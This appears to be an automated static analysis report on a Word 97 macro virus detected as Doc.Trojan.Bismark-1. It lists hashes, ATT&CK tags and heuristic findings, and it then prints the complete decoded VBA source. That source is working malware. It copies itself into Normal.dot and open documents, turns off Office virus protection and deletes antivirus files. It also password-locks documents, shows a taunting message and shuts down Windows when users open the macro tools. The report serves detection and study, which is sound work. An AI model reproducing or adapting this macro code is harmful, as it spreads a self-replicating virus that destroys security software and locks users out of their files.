Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa568495661c401b…

MALICIOUS

Office (OLE)

Size: 57.0 KB
Created: 1997-04-27 09:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 0b88fa4dcc58d5e009e574c6b1b46494
SHA-1: d4d501bc361d3743ab1df28d6981612b6da48352
SHA-256: fa568495661c401bcc279f9e0d8009c2868fb35e49845e9fd4d65e84194012e5
Risk Score: 248

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine. The AutoOpen macro attempts to copy itself to the Normal.dot template and the current document, indicating a propagation mechanism. The ClamAV detection 'Doc.Trojan.Bismark-1' strongly suggests a known malware family, though specific details are limited.

Heuristics 5

  • ClamAV: Doc.Trojan.Bismark-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bismark-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro, which runs automatically when the document is opened
    Matched line in script
        Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5423 bytes
SHA-256: 6897c2107212057baf9cfe80cd4e14494a761149fb276471d4fa9f417179e67a
Detection
ClamAV: Doc.Trojan.Bismark-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "BisMark"
Sub AutoOpen()
    On Error GoTo BisMark

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
      
    SetAttr "c:\program files\microsoft office\templates\normal.dot", vbNormal

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    documentinstalled = False
    Globalinstalled = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "BisMark" Then
            documentinstalled = True
        End If
   Next
  
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "BisMark" Then
            Globalinstalled = True
        End If
    Next

    If documentinstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
    End If

    If Globalinstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
    End If

    Application.DisplayAlerts = wdAlertsAll

BisMark:
BisMark
End Sub
Sub BisMark()
On Error GoTo BisMark
Application.StatusBar = True
StatusBar = "BisMark1 WMV97"
Application.Caption = "BisMark1 WMV97"
With ActiveDocument
.BuiltInDocumentProperties(wdPropertyTitle) = "BisMark1"
.BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
.BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyCompany) = "Virii Productions"
.BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus was Made By Talon"
End With
If WeekDay(Now()) = 4 And Hour(Now()) = 12 Then
AutoCorrect.Entries.Add Name:="the", Value:="Word Macro Virus BisMark1, Written By Talon"
Else
End If
BisMark:
End Sub
Sub ToolsMacro()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark1"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub Toolscustomize()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark1"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub ViewVBcode()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark1"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub FileSave()
On Error Resume Next
Kill "c:\program files\norton antivirus\Virscan2.dat"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
Kill "C:\program files\antiviral toolkit pro\*.*"
ActiveDocument.Save
End Sub
Sub FileClose()
On Error GoTo BisMark

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    documentinstalled = False
    Globalinstalled = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "BisMark" Then
            documentinstalled = True
        End If
   Next
  
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "BisMark" Then
            Globalinstalled = True
        End If
    Next

    If documentinstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
    End If

    If Globalinstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
    End If

    Application.DisplayAlerts = wdAlertsAll

BisMark:
ActiveDocument.Close
End Sub